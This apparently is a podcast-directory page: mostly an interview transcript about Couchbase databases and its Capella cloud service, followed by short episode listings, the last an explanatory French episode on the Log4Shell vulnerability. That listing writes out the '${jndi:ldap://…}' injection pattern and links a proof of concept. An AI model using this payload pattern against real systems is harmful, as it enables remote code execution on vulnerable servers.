Corey: It absolutely is. Something that I found as I've talked to a bunch of different companies operating in different ways is the requirements on data stores are generally very different depending upon primarily latency and performance. There's only so long people are going to watch the spinning circle of doom on a website before they realize they're going to go somewhere that has its act together. Conversely, for a lot of business intelligence and analytics queries, there are an awful lot of stories where the thing that people care about is that we actually have to have the results of this query by noon on Thursday. And there are very different use cases for that, and some companies seem to be focused very much on, “We're going to solve both of those use case extremes and everything in between with the same product offering,” and others tend to say, “Okay, this is the area of the market we're going to focus on.” You could also say that this is an expression of the larger industry question of do I want, more or less, a one-size-fits-most database that's general-purpose, or do I want very specific purpose-built databases based upon the use case and the problem? Where do you find yourself on that spectrum?

Chris: Where I find myself on that spectrum is that there's—if you want to describe it at a high level, and we can break it down, there's operational-type databases, which is where I'd say Couchbase fits. You're talking about, I've just built an application; I'm talking to the live user, right, this is what I care about, and when I'm talking about speed and performance here, I'm talking about something that returns within milliseconds of response time. I'm playing an online game, or I'm doing online betting on a sports game. That has to be pretty much instant, right? If we're playing multiplayer games and you're doing something, then I want to be able to see what you're doing straight away, right?
People don't expect it to lag there. If you're looking at streaming—people do this with Couchbase—streaming the Olympic Games or the Super Bowl in the US, and you want to be able to be there, that whole profile management of that user has to be instant; having that stream to you has to be instant. People making telephone calls use Couchbase, behind the scenes, for profile management, right, so they know who you are, who's making that call. That's an operational database problem. That's not a traditional analytical problem, right? So, there's a whole other space in the database world for analytics, right, which is bringing all the data together into one place, and that'll help you do data science, AI, machine learning, be able to crunch and compute large volumes of data. If I get back to you in an hour rather than a week, that's great, but that's not operational. That's analytical.

Corey: In data center environments, there's an argument to be made for going in a bunch of different directions; we're going to use a bunch of different data stores to store all these things. Because, generally speaking, the marginal cost of moving data from one of your data storage systems to another one of your data storage systems, one rack row over, is fairly small, whereas in cloud, effectively, there are no real capacity constraints anymore until you get the bill, but that's the entire problem where a lot of the transfer for these things is metered per gigabyte. So, there's an increased desire, and a lot of architectural pressure, to wind up making sure that where the data lives, it stays. And whatever it is that you do with that data, it should be able to operate on that data in a way that fits your performance characteristic requirements in the place that it currently is. And on the one hand, I can definitely see that driving a lot of decisions people have made. The counterargument is that it feels a little weird when the cost constraints come from how the cloud providers—mostly you, AWS—have decided to build these things out. And that, in turn, is shaping your entire approach to not just your architecture, but your systems design of how data winds up working its way through your lifecycle. It's frustrating, on some level, especially given that they themselves offer something like 15 distinct managed database offerings, with more announced all the time. It becomes very difficult not only to disambiguate between all of them but to afford moving data from one to the next.

Chris: The affordability is an interesting discussion, right, because you can look at it from a billing perspective and go, absolutely, there's a challenge associated to that. Then there is the question of where is my data, because it's spread across all these different services; that's another challenge. And then you have the challenge of, okay, the cost associated with having developers build applications against all these different types of services, because they all require different APIs and different ways of programming. So, there's a cost associated everywhere.

Corey: Oh, by far and away, the most expensive part of your AWS, or any cloud spend, is not the infrastructure itself; it's the payroll expense associated with the people working on it. People always cost more than infrastructure. If not, something very strange is going on.

Chris: But then you look at it, and you go, okay, if that's the case—I kind of use the analogy, right, that it's like a car, where everyone is talking these days about the electric car [that's going 00:16:05] on that path, right?
Now, I should be able—if I was getting an electric car—think of it now, I actually have one—to get in the car and drive it like any other car. I know what a steering wheel is, I know how my pedals work, it looks and feels like a normal car. But architecturally, it's fundamentally different in how it operates. So, why can't you apply that same thing, that same analogy, to a database, right?

So, why can't I have the ability, from an operational perspective—[unintelligible 00:16:42] talk about operational databases, not necessarily, I don't know, full-blown analytical databases—but operationally being able to say I can store the data in an enterprise database; I can use that to leverage my SQL skills like I have before, and also use it to have a document store, to do operational analytics, eventing, full-text search—key things that people want to do operationally—but keeping the data together in one database, like an iPhone. I want a database to have these capabilities; I don't want to have all these different types of devices that are everywhere. I want, you know, my iPhone to have the capabilities that I'm using. Or my car to feel like I'm driving a car; it doesn't matter if the underlying architecture of the engine changed. That's great, I want the benefit, but I want to be able to drive it in the same way that I've driven any other car out there. And that's kind of trying to solve multiple problems at once, because you're trying to solve the issue of skills.

Corey: It's one of the hard challenges out there, and I think your car analogy can even be extended a bit further, because in the early days of the automobile, you were more or less taking some significant risk by driving a car if you weren't also mechanically inclined and able to fix it yourself. And in time, we've sort of seen that continue to evolve where they mostly work, and now they work really reliably. And then you take it even a step beyond that, and all right, now I'm just going to pay a car service so someone else has to deal with the car and a driver, and I don't have to deal with any of that aspect. And it feels like there are certain parallels, similar to that, toward the end of last year, 2021, when you folks more or less moved away from “you can have it in any color you want, as long as you run it yourself”—more or less—into offering a fully-managed database-as-a-service cloud option called Capella, which, on the ads for this show, I periodically sing, because if you didn't want me to do that, you would not have named it Capella. Now, what was it that inspired you folks to say, “Hm, we could actually offer this as a managed service ourselves?” It's definitely a direction a lot of companies have gone in, but usually, they have to wait to be forced into it by—let's be serious for a second here—Amazon launching the Amazon Basics version of whatever it is themselves and, “Okay, well, they validated our market for us. Let's explore it.”

Chris: If you look at that, you go, Couchbase has been around for a good few years now selling, as you point out, high-performance databases to large-scale enterprises, for real mission-critical—people call it tier-zero—type applications, high-performance applications. And these are some of the most fascinating, most innovative types of applications that I've been involved with through my career.
Now, how can we take that capability and provide it to the mass market, if you like—to be able to give it to people that don't have a large number of people out there managing their own infrastructure, able to understand how to finely tune that underlying infrastructure to get the level of performance that you need from high-performance databases. Now, there are use cases for doing that, so it's not one or the other. It's not that you have to go all-in.

There are particular companies out there that, for economic reasons, for use case reasons, are running today on-premises, and there's a rational reason for why they do that, right? But for a lot of people out there, where they're leveraging the cloud, there's an opportunity here to take the power of the database, allow us to then manage it for people, and take away the complexity of it, while being able to give them the power so they can leverage their skills and take advantage of Couchbase far more easily than they've ever been able to in the past. It's opened up a bigger market for us, to summarize your question.

Corey: This episode is sponsored by our friends at Oracle Cloud. Counting the pennies, but still dreaming of deploying apps instead of “Hello, World” demos? Allow me to introduce you to Oracle's Always Free tier. It provides over 20 free services and infrastructure, networking, databases, observability, management, and security. And—let me be clear here—it's actually free. There's no surprise billing until you intentionally and proactively upgrade your account. This means you can provision a virtual machine instance or spin up an autonomous database that manages itself, all while gaining the networking, load balancing, and storage resources that somehow never quite make it into most free tiers needed to support the application that you want to build. With Always Free, you can do things like run small-scale applications or do proof-of-concept testing without spending a dime. You know that I always like to put asterisks next to the word free? This is actually free, no asterisk. Start now. Visit snark.cloud/oci-free, that's snark.cloud/oci-free.

Corey: One way that I tend to evaluate where a given vendor sees themselves—and it's sort of an odd thing to do, but given that I do fix AWS bills for a living, it probably makes sense—I wind up pulling up the website, I ignore the baseline stuff of the “This is what Gartner says” and here's a giant series of scrolls. I just go for the hamburger menu and I look for, “All right, where's the pricing information?” Because pricing speaks a lot. And there are two things I generally try to find. One is, is there a free trial that I can basically click and get started working with? Because invariably, I'm trying to beat my head off of a problem at two in the morning, and if it's, “Oh, talk to a salesperson,” well, as a hobbyist, or as an engineer who does not have signing authority for things, but it's talk to sales, I realize, “Oh, yeah. One, I probably can't afford it. Two, it's going to be a week or so before I can actually make progress on this, and I'm hoping to get something up by sunrise, and it's probably not for me.” Conversely, the enterprise tier should always have a “Call for details,” because that is a signal to large enterprise procurement departments and buyers and the rest where it's, “Oh, we will never accept default terms. We always want them customized. We also don't believe in signing any contract without at least two commas in it.” Great.
So, being able to speak to both ends of the market is one of those critical things that you folks absolutely nail. What I like is the fact that if someone has a problem that they're experimenting with at two in the morning, they can get started with your database-as-a-service platform—Capella; or however you want to sing it—and they don't need to wind up talking to you folks directly first. There are no long-term commitments, there's no [unintelligible 00:22:39] of the infrastructure themselves. There's no getting hounded for the rest of their days over making a purchase for something that didn't pan out.

To me, that's always been the real innovation and breakthrough of cloud: that I can spend a few hours some evening kicking around an idea, and if it doesn't work, I can turn it off and spend 17 cents on the process, whereas if it does work, I can keep scaling up without at some point having to replace all of the Raspberry Pis and popsicle sticks I build things with, with real enterprise-grade stuff. There's a real accessibility and democratization that has entered into it. So, I'm always excited when I see companies that are embracing that model. Because, yeah, I'm a grumpy old sysadmin—because it's not like there's a second kind of sysadmin—and I have a particular exposure and experience level with these things that I can't expect modern developers to share. They have an idea, they want to launch something, and they just need a database to throw things against and put data into, and ideally get it back again when they query it later. And that empowers them to move forward.

They're not in this because they really want to run virtual machines themselves and get those set up and secured and patched and hardened, and then install the software on top of it, and, “Why is it not working? Oh, security groups, how you vex me again. I'll just open you to the entire world,” and so on. And we know where that path leads. So, it's nice to see that there is an accessible option there.

Conversely, if you come at this with an approach of “we are only available in our hosted cloud environment,” well, now those big enterprise companies that have, you know, compliance concerns are going to have some thoughts for you, none of them particularly pleasant in some cases. So, I like the fact that you're able to expand your offering to encompass different user personas without also, I don't know, turning what has historically been a database into now it's an LDAP server, and trying to eat the world, piece by piece, component by component.

Chris: It's interesting that you say that, because I think there's a number of things that you're touching on there. To me, if you look at us as a company, particularly in this space, there's a lot of focus around the community and the open-source community. And I think there's an element of how do you make it accessible to people, as a community as a whole? And then you kind of go down the path of, “Okay, let's allow people”—as a developer, let's think of it this way, right: the ultimate thing they want to do, and you touched upon it there, is they want to build an application. They get passionate about building the application, or maybe even on the weekend, they've got this funky idea that they're going to literally knock some code out.

And I remember my fond memories of being an application engineer, being able to sit down for hours, just putting my ideas into code and watching it execute.
The last thing that I want to do is get to the point where I get the database and go, oh, here we go. This is going to take me a bunch of hours now, and I'm going to set it all up and do other stuff. And I almost literally want to be able to click a few buttons—

Corey: You know what I want to do tonight? Feel really dumb as I tackle a problem I don't fully understand. Gr—I'd love smacking into walls that point out my own ignorance. It's discouraging as hell. I'm right there with you.

Chris: Yeah, you don't want to do that, right? So, you almost want to make, like, the database disappear for people, right? You want to be able to just say, “Here's your command. Off you go. Bring the data back. Bring it back in full. Allow it to scale.” Because you want that developer to have that experience of not breaking their flow. And you want them to be so excited about the application and innovation that they've built that they want to go and show their teammates. They want to say, “Look at the great thing I built over the weekend. Look at this, this is amazing.” Right?

And then be able to get all the teammates pretty excited about what they built in a way in which they can try it out really easily, right? They can take this little thing that they built on the database, click some buttons, and off we go, right? And now your development team is super excited about some of the great innovation that you have. But you also have to have the reverse. It has to be architecturally sound, so then you get to the architect, if you like, who is looking at the bigger picture of what's the future going to look like? Is it the right technology? Is this something that we can bring into the organization? And, you know, this is a cool bit of application you just built me, but, you know, is it realistic that I can deploy this thing?

And this is where you start going back into: it still has to have high performance, the security has to be there, the scalability has to be there, so that I can potentially—I can start small and grow this thing horizontally as I see the requirements coming. There's a different set of requirements architecturally. So we're looking at—you know, as a company, our key focus is how do you drive that developer community, so that you give people the freedom to build the next generation of applications in the simplest way [unintelligible 00:27:35], say with free trials—click some buttons, have the database up in minutes—but also then being able to have that capability in the underlying database to take it to the architect. That's what our core focus is every day.

Corey: I agree with everything that you're saying. You're making an awful lot of great points, but for me, the proof in the pudding is the second thing that I tend to look at on your website after the pricing page, and that is your list of customers. Because it's always interesting when someone talks about how they're revolutionizing everything, and this is the way to go, and everyone who's anyone is doing these things. And then you look at their customer page and either they don't have one, which is telling, or the customers on that page are terrifying in that, “Wow, that sounds like a whole bunch of fly-by-night startups whose primary industry is scamming people.”

You have a bunch of household blue-chip names as well as a bunch of newer companies that are very clearly not what people think of as legacy—you know, that condescending engineering term that means it makes money.
It's across the board, it is broad-spectrum, and it is companies that absolutely know exactly what it is that they're doing when it comes to these things. That, to me, is far more convincing than almost anything else that can be said, because it's—look, you can come on and talk to me about anything you want about your product, and I can dismiss it and, “Yeah, whatever. Great.” But when I start talking to customers, as I did prior to recording this episode, and seeing how they talk about you folks, that to me is what reaffirms that, okay, this is actually something that has legs and is solving real customer problems.

Because early stage, it's, “We have this idea for this company we're going to build and it's going to be great.” “Awesome. Go talk to more customers.” That is a default, safe piece of advice generically you can give to anyone. And it's easy to give and hard to take. I've been saying this for years, and I still screwed it up when we started trying to launch a SaaS product here called DuckTools. Yeah, it turns out that we didn't talk to enough customers first about what they're actually trying to achieve, and we assumed we knew the answers. It's an easy mistake to make. What I really appreciate about Couchbase in particular is not just the fact that you have all of these customer references, but the fact that each one talks about what the value to the business is, not just in terms of, “Oh yes, now we can query data and there was no way for us to do that before.” Of course, people have found ways to do that since business started.

Instead, it's much more about this is how it made it more efficient, more optimal, how it unlocked possibilities and capabilities for us. That alone tells me that there definitely is significant value that you're delivering to customers. In my own business, whenever I think I've seen it all, all I have to do is talk to one more customer and learn something new. What have you seen in recent memory, from a customer, that surprised you about how they're using Couchbase?

Chris: You look at that, and you can see—I could probably talk for hours on different types of customers, but it's the ones that you can literally see in your life and relate to, right? So, if you take one of the biggest airlines that are out there today, they're completely changing, kind of, the whole experience. And our whole experience of… how do I get feedback? Because Couchbase's customer's [unintelligible 00:31:01] customer, right, is what they're thinking about, right? They're an airline.

So, these passengers; fine. But how many times have you got on a plane, and you see all these people—literally, there's obviously the passengers, and then there's the cabin crew, and then there's the people on the ground, and then there's the pilot—and, for the sake of the discussion, the staff that are there are literally passing paper back and forth to each other. And surely there's a better way to do this.
And for someone who likes to solve complex technical problems, you go, “Wow, this is going to be a bit of a challenge.” Because if you want to collect feedback from an aeroplane in the air, [laugh] right, and you want to connect that to the ground data that people are having in terms of maintenance data, and you want to do that across the world, in multiple different time zones, that's a pretty tricky problem to try to go solve, right?

So therefore, how do you get a database that is able to work remotely and on what people would call the edge—let's just call it, in this case, a device that a cabin crew member is literally carrying around with them—that's not connected, because there is no connection, because I'm in the middle of the air. But I want to pair it with the other cabin crew members that are around, right, in flight, and then when I land, I want to sync that data back up to the maintenance people. So, you need a database that's able to operate on a device with no connection, and then be able to synchronize back up to a cloud database that is then collecting data from all the other flights around the world.

Corey: Synchronization sounds super easy until you actually try and do it, and then, “Oh, wow.” It's like, you could get cut to pieces by the edge cases.

Chris: And then people go, “Well, there's no problem. There's internet everywhere these days.” Yeah, sure there is. [laugh]. You get disconnected all of the time.

Corey: Not to name names. This is very evocative of an earlier episode of this show I had with Tyler Slove, who's a senior manager over at United Airlines, about specifically how they're approaching a lot of their own reimagining and the rest. It's a fascinating use case, and as someone who's a bit of a travel geek himself—you know, in the before times—that's always an area of intense interest because it's… I'm sorry, I'm still a little boy at heart; it's magic to me. You get on a plane, you go somewhere else, close the doors, they open up, and you're on the other side of the world. And now there's internet on it? Oh, my God, who would have imagined such a thing?

Chris: Uh-huh. But that's changing the experience for people. It's just really fascinating.

Corey: Completely. And it's empowering and unlocking that experience you're talking about of being able to sync between the crews, about handling all this stuff behind the scenes. Everyone loves to complain about airlines because no one really knows how to run the massive logistical part of an airline. But the WiFi was a little bit slow or the food was cold; well, that's something I know how to complain about on Twitter.

Chris: [laugh].

Corey: It becomes this idea of almost a bikeshed problem expression, where it's, “Oh, yeah. I'm just going to complain about things I can wrap my head around.” Yeah.

Chris: I was talking to somebody recently, and they were—swapping topics a little bit—and they were like, so—they were talking about innovation on some new web application that they built. And I literally had to explain to them, and I said, “Well, if you think of it, the underlying whole technology stack that's behind this for high-scale e-commerce, it's sophisticated, right, because people will literally walk away from a page, an application, a mobile app, if they don't get an instant response time.
And that request has to literally travel, physically, quite a fair amount of distance, talk to multiple different types of technology, answer that question, and then come back to you instantly.” The sheer amount of technology that's involved here in moving that data around is a complicated architectural problem to fix. A database only plays a small part of that. You can't be the slowest player in the party.

Corey: No. And that is always the challenge, is that when you're looking at different use cases, there's always a constraint, and how that constraint winds up manifesting in different ways. If it's not the thing that's slowing things down, it's also not where the attention goes. If you have a single thing—the database, for example—slowing things down, everyone cares about improving databases; if people focus on, “Well, we're going to improve the JavaScript load time on the website,” that's not the problem. Find the bottleneck and focus on it. And although I'm generally a fan of picking a database and using that as a general-purpose thing until it makes sense not to—much like I am cloud providers—[audio break 00:35:54]

Corey: —journey personally, where's the best place to find you?

Chris: Clearly, if you want to find out more about Couchbase, you can obviously go to couchbase.com. As you kindly pointed out, you can go and look at the trial for Capella and try out the tech. You're more than welcome to do that as a free trial.

If you want to contact me particularly, you can find me on LinkedIn; I'm Chris Harris at Couchbase. You'll find me [unintelligible 00:36:26] with Chris Harris in general and probably find lots of them. In the UK, Chris Harris is a famous racing driver. That's not me; it's someone else. So, find me on LinkedIn; I'm sure it won't be that difficult to find me. Or you can find me on Twitter.

Corey: And we will, of course, put links to all of that in the [show notes 00:36:43]. I really want to thank you for being so generous with your time today. It's always appreciated to talk to people who actually know what they're doing.

Chris: You're more than welcome. It's been great to be on the show. Thanks, Corey.

Corey: Chris Harris, Vice President of Global Field Engineering at Couchbase. I'm Cloud Economist Corey Quinn, and this is Screaming in the Cloud. If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice along with an angry comment. I'm going to wind up using all of those angry comments, at one point, as a database.

Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.

Announcer: This has been a HumblePod production. Stay humble.
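To ground the “power of SQL on a JSON database” idea from the conversation above, here is a minimal sketch of what that looks like from application code. This assumes the Couchbase Java SDK 3.x API; the connection string, credentials, and the travel-sample bucket are placeholders rather than anything specific to this episode.

import com.couchbase.client.java.Cluster;
import com.couchbase.client.java.json.JsonObject;
import com.couchbase.client.java.query.QueryResult;

public class CapellaQuerySketch {
    public static void main(String[] args) {
        // Placeholder endpoint and credentials for a Capella or self-managed cluster.
        Cluster cluster = Cluster.connect("couchbases://cb.example.cloud", "username", "password");

        // SQL++ (N1QL): familiar SQL syntax running over schemaless JSON documents.
        QueryResult result = cluster.query(
                "SELECT t.name, t.country FROM `travel-sample` t WHERE t.type = \"airline\" LIMIT 3");

        // Each row comes back as a JSON object, not a fixed relational tuple.
        for (JsonObject row : result.rowsAsObject()) {
            System.out.println(row);
        }

        cluster.disconnect();
    }
}

The point of the sketch is the one Chris makes in the interview: the query reads like ordinary SQL, while the underlying documents stay flexible JSON.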

Cyber and Technology with Mike
12 April 2022 Cyber and Tech News

Cyber and Technology with Mike

Play Episode Listen Later Apr 12, 2022 11:21


In today's podcast we cover four crucial cyber and technology topics, including:
1. NGINX addresses flaws in its LDAP reference implementation that could be exploited
2. SuperCare Health notifying patients and employees of 2021 data breach
3. Anonymous hacks Russian Ministry of Culture, leaks emails
4. Russian effort to attack electric power in Ukraine foiled
I'd love feedback; feel free to send your comments and feedback to cyberandtechwithmike@gmail.com

The Tech Blog Writer Podcast
1940: Solving the Identity Management Crisis

The Tech Blog Writer Podcast

Play Episode Listen Later Apr 10, 2022 25:35


Wade Ellery, Senior Solution Architect at Radiant Logic, joins me on Tech Talks Daily to discuss how many organizations have an identity management crisis without realizing it, and what they can do to solve the problem. For many organizations, identity data exists in multiple forms across different locations (such as LDAP, AD, SQL, and web services), which creates a fragmented infrastructure within the organization, slowing user authentication and expanding the organization's attack surface. Many organizations see current Identity Access Management solutions as incapable of meeting the demands of scalability, performance, and security needed in the work-from-anywhere era. So, what can be done to solve the identity management crisis experienced by organizations today? We discuss how many realize too late that they suffer from a fragmented infrastructure that results in sprawl, and why digital transformation has exacerbated organizations' current identity management problem. Finally, I learn more about how an identity data fabric can help solve the identity sprawl problem.
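As a rough illustration of what talking to just one of those identity silos looks like, here is a minimal sketch using Java's built-in JNDI LDAP support; the host, base DN, and search filter are placeholder values, not anything from Radiant Logic. Multiply this by AD, SQL, and web services, each with its own API, and the fragmentation problem the episode describes becomes concrete.

import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.NamingEnumeration;
import javax.naming.directory.DirContext;
import javax.naming.directory.InitialDirContext;
import javax.naming.directory.SearchControls;
import javax.naming.directory.SearchResult;

public class LdapLookupSketch {
    public static void main(String[] args) throws Exception {
        Hashtable<String, String> env = new Hashtable<>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
        env.put(Context.PROVIDER_URL, "ldap://ldap.example.com:389"); // placeholder host

        DirContext ctx = new InitialDirContext(env);
        try {
            SearchControls controls = new SearchControls();
            controls.setSearchScope(SearchControls.SUBTREE_SCOPE);

            // Look up one user in this directory; every other identity store
            // (AD, SQL, web services) needs its own, different version of this.
            NamingEnumeration<SearchResult> results = ctx.search(
                    "ou=people,dc=example,dc=com", // placeholder base DN
                    "(uid=jdoe)",                  // placeholder filter
                    controls);

            while (results.hasMore()) {
                System.out.println(results.next().getNameInNamespace());
            }
        } finally {
            ctx.close();
        }
    }
}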

The History of Computing
The Earliest Days of Microsoft Windows NT

The History of Computing

Play Episode Listen Later Mar 24, 2022 17:55


The first operating systems as we might think of them today (or at least anything beyond a basic task manager) shipped in the form of Multics in 1969. Some of the people who worked on that then helped create Unix at Bell Labs in 1971. Throughout the 1970s and 1980s, Unix flowed to education, research, and corporate environments through minicomputers, and many in those environments thought a flavor of BSD, or Berkeley Software Distribution, might become the operating system of choice on microcomputers. But the microcomputer movement had a whole other plan, if only in spite of the elder minicomputers. Apple DOS was created in 1978, in a time when most companies who made computers had to make their own DOS as well, if only so software developers could build disks capable of booting the machines. Microsoft created their Disk Operating System, or MS-DOS, in 1981. They proceeded to release Windows 1 to sit on top of MS-DOS in 1985, which was built in Intel's 8086 assembler and called operating system services via interrupts. That led to poor programmers locking down entry points in order to access memory addresses, with code written assuming a single-user operating system. Then came Windows 2 in 1987, Windows 3 in 1990, and one of the most anticipated operating systems of all time in 1995 with Windows 95. 95 turned into 98, and then Millennium in 2000. But in the meantime, Microsoft began work on another generation of operating systems based on a fusion of ideas between work they were doing with IBM, work architects had done at Digital Equipment Corporation (DEC), and rethinking all of it with modern foundations of APIs and layers of security sitting atop a kernel. Microsoft worked on OS/2 with IBM from 1985 to 1989. This was to be the IBM-blessed successor to the personal computer. But IBM was losing control of the PC market with the rise of cloned IBM architectures. IBM was also big and corporate, and the small, fledgling Microsoft was able to move quicker. Really small companies that find success often don't mesh well with really big companies that have layers of bureaucracy. The people Microsoft originally worked with were nimble and moved quickly. The ones presiding over the massive sales and go-to-market efforts and the explosion in engineering team size were back to the old IBM. OS/2 had APIs for most everything the computer could do. This meant that programmers weren't just calling assembly any time they wanted and invading whatever memory addresses they wanted. They also wanted preemptive multitasking and threading. And a file system, since by then computers had internal hard drives. The Microsoft and IBM relationship fell apart and Microsoft decided to go their own way. Microsoft realized that DOS was old and that building on top of DOS was going to some day be a big, big problem. Windows 3 was closer, as was 95, so they continued on with that plan. But they started something similar to what we'd call a fork of OS/2 today. So Gates went out to recruit the best in the industry. He hired Dave Cutler from Digital Equipment to take on the architecture of the new operating system. Cutler had worked on the VMS operating system and helped lead efforts for a next-generation operating system at DEC that they called MICA. And that moment began the march towards a new operating system called NT, which borrowed much of the best from VMS, Microsoft Windows, and OS/2 - and had little baggage.
Microsoft was supposed to make version 3 of OS/2, but NT OS/2 3.0 would become just Windows NT when Microsoft stopped developing on OS/2. It took 12 years, because um, they had a loooooot of customers after the wild success of first Windows 3 and then Windows 95, but eventually Cutler and team's NT would replace all other operating systems in the family with the release of Windows 2000. Cutler wanted to escape the confines of what was by then the second largest computing company in the world. Cutler had worked on VMS and RSX-11M before he got to Microsoft. There were constant turf battles and arguments about microkernels and system architecture, and meetings weren't always conducive to actually shipping code. So Cutler went somewhere he could. At least, so long as they kept IBM at bay. Cutler brought some of the team from Digital with him and they got to work on that next generation of operating systems in 1988. They sat down to decide what they wanted to build, using the NT OS/2 operating system they had as a starting point. Microsoft had sold Xenix and the team knew about most every operating system on the market at the time. They wanted a multi-user environment like a Unix. They wanted programming APIs, especially for networking, but different than what BSD had. In fact, many of the paths and structures of networking commands in Windows still harken back to emulating those structures. The system would be slow on the 8086 processor, but ever since the days of Xerox PARC, everyone knew Moore's Law was real and that the processors would double in speed every other year. Especially since Moore was still at Intel and could make his law remain true with the 286 and 386 chips in the pipeline. They also wanted the operating system to be portable, since IBM had selected the Intel CPU but there were plenty of other CPU architectures out there as well. The original name for NT was to be OS/2 3.0. But the IBM and Microsoft relationship fell apart and the two companies took their operating systems in different directions. OS/2 went the direction of Warp and IBM never recovered. NT went in a direction where some ideas came over from Windows 95 or 3.1, but mostly the team just added layers of APIs and focused on making NT a fully 32-bit version of Windows that could be ported to other platforms including MIPS, PowerPC, and the DEC Alpha that Cutler had exposure to from his days at Digital. The name became Windows NT, and NT began with version 3, as it was in fact the third installment of OS/2. The team began with Cutler and a few others, grew to eight, and by the time it finally shipped as NT 3.1 in 1993 there were a few hundred people working on the project. Where Windows 95 became the mass-marketed operating system, NT took lessons learned from the Unix, IBM mainframe, and VMS worlds and packed them into an operating system that could run on a corporate desktop computer, as microcomputers were called by then. The project cost $150 million, about the same as the first iPhone. It was a rough start. But that core team and those who followed did what Apple couldn't, in a time when a missing modern operating system nearly put Apple out of business. Cutler inspired, good managers drove teams forward, some bad managers left, other bad managers stayed, and in an almost agile development environment they managed to break through the conflicts and ship an operating system that didn't actually seem like it was built by a committee. Bill Gates knew the market and was patient enough to let NT 3 mature.
They took parts of OS/2, like LAN Manager. They took parts of Unix, like ping. But those were at the application level. The microkernel was the most important part. And that was a small core team, like it always is. The first version they shipped to the public was Windows NT 3.1. The sales people found it easiest to often say that NT was the business-oriented operating system. Over time, the Windows NT series was slowly enlarged to become the company's general-purpose OS product line for all PCs, and thus Microsoft abandoned the Windows 9x family, which might or might not have a lot to do with the poor reviews Millennium Edition had. Other aspects of the application layer the original team didn't do much with included the GUI, which was much more similar to Windows 3.x. But based on great APIs, they were able to move faster than most, especially in that era where Unix was in weird legal territory, changing hands from Bell to Novell, and BSD was also in dubious legal territory. The Linux kernel had been written in 1991 but wasn't yet a desktop-class operating system. So the remaining choices most businesses considered were really Mac, which had serious operating system issues at the time and seemed to lack a vision since Steve Jobs left the company, or Windows. Windows NT 3.5 was introduced in 1994, followed by 3.51 a year later. During those releases they shored up access control lists for files, functions, and services. Services being similar in nearly every way to a process in Unix. It sported a TCP/IP network stack, but also NetBIOS for locating computers to establish a share, and a file sharing stack in LAN Manager based on the Server Message Block, or SMB, protocol that Barry Feigenbaum wrote at IBM in 1983 to turn a DOS computer into a file server. Over the years, Microsoft and 3COM added additional functionality, and Microsoft later added LDAP, out of the University of Michigan, as a directory backend and Kerberos, out of MIT, to provide single sign-on services. 3.51 also brought a lot of user-mode components from Windows 95. That included the Windows 95 common control library, which included the rich edit control, and a number of tools for developers. NT could run DOS software; now they were getting it to run Windows 95 software without sacrificing the security of the operating system where possible. It kinda' looked like a slightly more boring version of 95. And some of the features were a little harder to use, like configuring a SCSI driver to get a tape drive to work. But they got the ability to run Office 95, and it was the last version that ran the old Program Manager graphical interface. Cutler had been joined by Moshe Dunie, who led the management side of NT 3.1 through NT 4 and became the VP of the Windows Operating System Division, so he also had responsibility for Windows 98 and 2000. For perspective, that operating system group grew to include 3,000 badged Microsoft employees and about half that number of contractors. Mark Lucovsky and Lou Perazzoli joined from Digital. Jim Allchin came in from Banyan Vines. Windows NT 4.0 was released in 1996, with a GUI very similar to Windows 95. NT 4 became the workhorse of the field that emerged for large deployments of computers we now refer to as enterprise computing. It didn't have all the animation-type bells and whistles of 95, but did perform about as well as any operating system could. It had the NT Explorer to browse files and a Start menu, for which many of us just clicked Run and typed cmd.
It had a Windows Desktop Update and a task scheduler. They released a number of features that would take years for other vendors to catch up with. DCOM, or the Distributed Component Object Model, and Object Linking & Embedding (or OLE) were core aspects any developer had to learn. The Telephony API (or TAPI) allowed access to the modem. The Microsoft Transaction Server allowed developers to build distributed transactional applications, and the Winsock stack let developers build network applications on their own sockets. The Crypto API allowed developers to encrypt information in their applications. The Microsoft Message Queuing service allowed queued data transfer between services. They also built in DirectX support and already had OpenGL support. The Task Manager in NT 4 was like an awesome graphical version of the top command on Unix. And it came with Internet Explorer 2 built in. NT 4 would be followed by a series of service packs for 4 years before the next generation of operating system was ready. That was Windows NT 5.0, more colloquially known as Windows 2000. In those years, NT became known as NT Workstation, the server became known as NT Server, and they built out Terminal Server Edition in collaboration with Citrix. And across 6 service packs, NT became the standard in enterprise computing. IBM released OS/2 Warp version 4.52 in 2001, but never had even a fraction of the sales Microsoft did. By contrast, NT 5.1 became Windows XP and 6 became Vista, while OS/2 was cancelled in 2005.

Navigating the Cloud Journey
Episode 8: Identity In The Cloud

Navigating the Cloud Journey

Play Episode Listen Later Mar 3, 2022 31:38 Transcription Available


UPDATE: We have a new podcast host - Jim Mandelbaum! We will certainly miss Mike V as Jim takes over the reins, and we know he will do a bang-up job. Just listen to his first episode here! - Jon

Now ... about this episode ...

Ensuring that the right person has the right access, to the right application(s), at the right time is essential to any organization's security and operational efficiency. And - when you move to the Cloud, your identity footprint expands and becomes even more complex to manage.

In this episode, Jim speaks with Diana Volere, a Senior Security Partner at Netflix. Diana walks us through best practices for identity automation, building authoritative sources, privileged access management, and why LDAP and Active Directory are not enough, and discusses the new reality of how identity changes when you're in the Cloud.

Les Cast Codeurs Podcast
LCC 272 - Interview sur Log4Shell avec this

Les Cast Codeurs Podcast

Play Episode Listen Later Feb 12, 2022 105:23


Emmanuel and Arnaud look back at the famous #log4shell vulnerability that kept a lot of Java teams busy in December and January. Recorded February 11, 2022. Download the episode: LesCastCodeurs-Episode–272.mp3

Interview

What is this vulnerability, and why is it so dangerous?

CVE–2021–44228
- Reported to Apache on November 24, registered as a CVE on November 26
- Probably known since at least March 2021: https://github.com/nice0e3/log4j_POC
- Fixed in 2.15.0 on December 10
- "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints."
- CVSS severity of 10 out of 10, never seen before
- Back to basics: what is JNDI?
- The JNDI features used in configurations, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints
- The attacker finds a piece of user data that gets logged (not just over HTTP) and injects ${jndi:ldap://…} pointing to a malicious LDAP server, which returns serialized Java code; log4j deserializes it and executes whatever the attacker wants
- This affects log4j2-core, not the API
